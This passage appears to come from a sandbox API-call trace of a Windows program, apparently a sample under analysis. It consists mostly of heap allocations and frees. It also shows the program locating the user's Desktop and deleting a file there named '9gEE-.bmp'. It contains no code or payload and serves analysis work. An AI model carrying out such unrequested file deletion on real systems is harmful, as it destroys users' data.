wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0088.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0088.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0088.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0088.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0088.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75d08 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0088.289] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0088.289] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0088.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0088.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0088.290] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75ee8 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0088.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0088.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5da70 [0088.291] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/9gEE-.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\9gEE-.bmp", lpFilePart=0x8cedf4*="9gEE-.bmp") returned 0x21 [0088.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5da70 | out: hHeap=0x2af0000) returned 1 [0088.291] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9gEE-.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\9gee-.bmp")) returned 0x20 [0088.291] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9gEE-.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 0x9a4180 [0088.291] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9gEE-.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\9gee-.bmp")) returned 1 [0088.314] FindNextFileW (in: hFindFile=0x9a4180, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 0 [0088.314] FindClose (in: hFindFile=0x9a4180 | out: hFindFile=0x9a4180) returned 1 [0088.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ee8 | out: hHeap=0x2af0000) returned 1 [0088.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0088.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0088.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0088.315] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0088.315] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0088.315] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6760 [0088.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0088.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75c90 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0088.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5db10 [0088.316] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/9gEE-.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\9gEE-.bmp", lpFilePart=0x8cf650*="9gEE-.bmp") returned 0x21 [0088.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5db10 | out: hHeap=0x2af0000) returned 1 [0088.317] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9gEE-.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\9gee-.bmp")) returned 0xffffffff [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75c90 | out: hHeap=0x2af0000) returned 1 [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0088.317] 